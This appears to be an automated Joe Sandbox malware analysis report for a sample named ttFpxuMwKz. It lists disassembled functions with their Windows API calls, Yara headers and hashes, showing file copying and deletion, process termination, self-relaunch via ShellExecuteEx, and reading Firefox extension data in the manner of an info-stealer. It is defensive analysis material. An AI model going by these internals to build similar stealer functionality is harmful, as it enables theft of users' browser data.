                                    Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                    • ExitProcess.KERNEL32 ref: 00416755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 51a131c635dea9461ca5fbd9e512c5680335e93ee14c93c1efa3311f51896025
                                    • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                    • Opcode Fuzzy Hash: 51a131c635dea9461ca5fbd9e512c5680335e93ee14c93c1efa3311f51896025
                                    • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                    Function 00406BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: @Jn@$Jn@$Jn@
                                    • API String ID: 544645111-1180188686
                                    • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                    • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                    • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                    • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                    Function 0041A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcatlstrcpy
                                    • String ID: vI@$vI@
                                    • API String ID: 3905823039-1245421781
                                    • Opcode ID: fdbee14e0802cf6b2965d2f6b2dd0298cd0a1d0021e9d1410a9323d4b8571ec6
                                    • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                    • Opcode Fuzzy Hash: fdbee14e0802cf6b2965d2f6b2dd0298cd0a1d0021e9d1410a9323d4b8571ec6
                                    • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                    Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                    • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                    • wsprintfW.USER32 ref: 00418D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 659108358-2783943728
                                    • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                    • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                    • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                    • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                    Function 007EA4C7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007EA548
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 007EA666
                                    • lstrlen.KERNEL32(00000000), ref: 007EA923
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 007EA094
                                    • DeleteFileA.KERNEL32(00000000), ref: 007EA9AA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                    • String ID:
                                    • API String ID: 257331557-0
                                    • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                    • Instruction ID: 8b72810c9f6120864f964e9fcee1ddb77df5954423447aef0cdf9dc606e698d9
                                    • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                    • Instruction Fuzzy Hash: 12E1C2B291011CFBCB05EBA4DD96DFE7339AF14300F508169F25A72291DE386A4CCB62
                                    Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                    • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                    • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                    • String ID:
                                    • API String ID: 257331557-0
                                    • Opcode ID: 187ffd4c9462aa23556ef9b5443141304392004e6ff5cea6192e155308f1c96e
                                    • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                    • Opcode Fuzzy Hash: 187ffd4c9462aa23556ef9b5443141304392004e6ff5cea6192e155308f1c96e
                                    • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                    Function 007ED667 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED6E8
                                    • lstrlen.KERNEL32(00000000), ref: 007ED8FF
                                    • lstrlen.KERNEL32(00000000), ref: 007ED913
                                    • DeleteFileA.KERNEL32(00000000), ref: 007ED992
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                    • Instruction ID: 70c7f0d741dde8ad86857139f0489c534b657be1cb601b8db632405d29cc5309
                                    • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                    • Instruction Fuzzy Hash: ED91E3B191011CEBCB14FBA4DD5ADFE7339AF14300F508569F20A62251EF786A48CB62
                                    Function 0040D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                    • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                    • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 71153f48811ab97277adb1eba65f0c2a50862b60df6060ffb178010a9f1e5c68
                                    • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                    • Opcode Fuzzy Hash: 71153f48811ab97277adb1eba65f0c2a50862b60df6060ffb178010a9f1e5c68
                                    • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                    Function 007ED9E7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007EDA68
                                    • lstrlen.KERNEL32(00000000), ref: 007EDC06
                                    • lstrlen.KERNEL32(00000000), ref: 007EDC1A
                                    • DeleteFileA.KERNEL32(00000000), ref: 007EDC99
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                    • Instruction ID: 23e8475816d1de6dd38c7c05c17032bc9211784bd5a9bb57e2fadd637c03e18d
                                    • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                    • Instruction Fuzzy Hash: 9981D5B191021CEBCB14FBA4DD6ADFD7335AF54300F50456DF20A66291EF786A48CB62
                                    Function 0040D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                    • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                    • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 6f72e535e7ae17eb60bcd9d89638ab31fc633a2b1ef8f0b3f434f04c74d69d2e
                                    • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                    • Opcode Fuzzy Hash: 6f72e535e7ae17eb60bcd9d89638ab31fc633a2b1ef8f0b3f434f04c74d69d2e
                                    • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                    Function 0040F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                    • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: 332d76602d9979ba15099d14f0ed3dabde39ec0bd50ccc42a35f2ccae80d985e
                                    • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                    • Opcode Fuzzy Hash: 332d76602d9979ba15099d14f0ed3dabde39ec0bd50ccc42a35f2ccae80d985e
                                    • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                    Function 007F9737 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 007F9752
                                      • Part of subcall function 007F8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007F9785,00000000), ref: 007F8FC2
                                      • Part of subcall function 007F8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 007F8FC9
                                      • Part of subcall function 007F8FB7: wsprintfW.USER32 ref: 007F8FDF
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 007F9812
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F9830
                                    • CloseHandle.KERNEL32(00000000), ref: 007F983D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 3729781310-0
                                    • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                    • Instruction ID: 3c8a881be0221b62f2fd8210e0abaf4b198e24112bcdc1188fe19ac727414cff
                                    • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                    • Instruction Fuzzy Hash: E6313AB5E0024CEFDB14DFE4CC49BEDB7B9EF45300F108459E606AA284DB786A84CB52
                                    Function 004194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 004194EB
                                      • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                      • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                      • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                    • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 396451647-0
                                    • Opcode ID: ee457ade85a58c401a034cc046952df660dfe0af018f09e7080f0d4154ab9e94
                                    • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                    • Opcode Fuzzy Hash: ee457ade85a58c401a034cc046952df660dfe0af018f09e7080f0d4154ab9e94
